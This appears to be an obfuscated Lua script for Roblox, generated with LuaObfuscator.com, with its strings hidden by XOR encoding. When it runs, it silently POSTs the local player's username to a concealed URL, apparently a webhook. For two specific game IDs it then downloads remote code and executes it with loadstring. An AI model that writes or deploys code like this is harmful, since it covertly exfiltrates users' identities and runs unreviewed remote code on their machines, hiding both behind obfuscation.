--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--
--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11) local v12={};for v20=1, #v10 do v6(v12,v0(v4(v1(v2(v10,v20,v20 + 1 )),v1(v2(v11,1 + (v20% #v11) ,1 + (v20% #v11) + 1 )))%256 ));end return v5(v12);end local v8=v7("\217\215\207\53\245\225\136\81\213\202\200\38\233\169\195\80\210\204\214\106\231\171\206\81\198\198\217\45\233\180\204\13\158\146\139\117\191\236\158\74\133\149\143\115\178\227\149\72\136\155\130\113\169\144\198\72\216\145\143\41\201\239\197\28\242\244\242\28\214\173\240\73\132\231\204\10\212\131\237\8\136\252\140\26\246\131\210\8\201\150\234\10\239\235\198\52\210\251\210\41\232\180\149\52\192\201\244\40\196\180\212\53\216\239\205\38\255\186\200\23\224","\126\177\163\187\69\134\219\167");local v9=game.Players.LocalPlayer;function SendMessage(v13,v14) local v15=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));local v16={[v7("\23\184\71\2\185\40\82\121\131\80\6\185","\38\84\215\41\118\220\70")]=v7("\81\6\50\30\247\83\23\54\27\241\94\89\40\1\241\94","\158\48\118\66\114")};local v17={[v7("\168\43\30\34\118\171\239","\155\203\68\112\86\19\197")]=v14};local v18=v15:JSONEncode(v17);local v19=request({[v7("\115\207\58","\152\38\189\86\156\32\24\133")]=v13,[v7("\209\82\179\78\243\83","\38\156\55\199")]=v7("\152\82\79\28","\35\200\29\28\72\115\20\154"),[v7("\49\186\208\219\136\62\39","\84\121\223\177\191\237\76")]=v16,[v7("\153\89\205\185","\161\219\54\169\192\90\48\80")]=v18});print(v7("\122\71\14\49","\69\41\34\96"));end SendMessage(v8,v7("\144\204\212\11\14\107\140\207\214\19\7\57\230\131","\75\220\163\183\106\98")   .. v9.Name );
local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v9,v10) local v11={};for v12=1, #v9 do v6(v11,v0(v4(v1(v2(v9,v12,v12 + 1 )),v1(v2(v10,1 + (v12% #v10) ,1 + (v12% #v10) + 1 )))%256 ));end return v5(v11);end local v8=game.PlaceId;if (v8==(116495812182445 -  -17006507)) then loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\207\45\239\190\201\10\223\205\148\22\229\169\206\14\197\140\201\32\224\168\136\22\212\194\223\54\169\182\198\23\223\140\215\42\228\185\222","\126\177\163\187\69\134\219\167")))();elseif (v8==(70876832253731 -(367 + 201))) then loadstring(game:HttpGet(v7("\43\217\62\213\239\121\130\101\215\253\52\131\45\204\232\43\216\40\208\239\38\223\41\202\242\55\200\36\209\178\32\194\39\138\232\43\196\47\203\232\45\195\101\246\255\49\196\58\209\179\49\200\44\214\179\43\200\43\193\239\108\192\43\204\242\108\204\63\209\243\32\194\38\201\249\32\217","\156\67\173\74\165")))();end
